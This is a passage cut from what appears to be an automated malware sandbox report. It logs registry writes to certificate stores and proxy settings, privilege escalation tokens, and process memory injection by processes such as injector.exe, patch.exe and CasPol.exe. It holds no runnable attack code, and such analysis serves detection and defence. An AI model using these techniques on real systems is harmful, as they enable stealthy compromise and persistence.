Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing JUNRlIz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\WpadDecisionReason = "1" JUNRlIz.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\WpadNetworkName = "Network 3" JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2024 conhost.exe 544 conhost.exe 540 cmd.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 2596 injector.exe 2596 injector.exe 1988 powershell.EXE 2596 injector.exe 1988 powershell.EXE 1988 powershell.EXE 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 452 powershell.EXE 452 powershell.EXE 452 powershell.EXE 2596 injector.exe 2596 injector.exe 2156 csrss.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe 2156 csrss.exe 2596 injector.exe 2156 csrss.exe 2596 injector.exe 2596 injector.exe 2596 injector.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1800 CasPol.exe Token: SeDebugPrivilege 2024 conhost.exe Token: SeDebugPrivilege 544 conhost.exe Token: SeImpersonatePrivilege 544 conhost.exe Token: SeDebugPrivilege 540 cmd.exe Token: SeImpersonatePrivilege 540 cmd.exe Token: SeSystemEnvironmentPrivilege 2156 csrss.exe Token: SeDebugPrivilege 1988 powershell.EXE Token: SeDebugPrivilege 452 powershell.EXE Token: SeSecurityPrivilege 700 conhost.exe Token: SeSecurityPrivilege 700 conhost.exe Token: SeDebugPrivilege 3056 conhost.exe Token: SeDebugPrivilege 1672 powershell.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 700 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 700 wrote to memory of 2024 700 conhost.exe 186 PID 700 wrote to memory of 2024 700 conhost.exe 186 PID 700 wrote to memory of 2024 700 conhost.exe 186 PID 700 wrote to memory of 2024 700 conhost.exe 186 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 700 wrote to memory of 1800 700 conhost.exe 30 PID 1800 wrote to memory of 540 1800 CasPol.exe 226 PID 1800 wrote to memory of 540 1800 CasPol.exe 226 PID 1800 wrote to memory of 540 1800 CasPol.exe 226 PID 1800 wrote to memory of 540 1800 CasPol.exe 226 PID 1800 wrote to memory of 544 1800 CasPol.exe 270 PID 1800 wrote to memory of 544 1800 CasPol.exe 270 PID 1800 wrote to memory of 544 1800 CasPol.exe 270 PID 1800 wrote to memory of 544 1800 CasPol.exe 270 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 1872 1800 CasPol.exe 34 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2956 1800 CasPol.exe 71 PID 1800 wrote to memory of 2340 1800 CasPol.exe 39 PID 1800 wrote to memory of 2340 1800 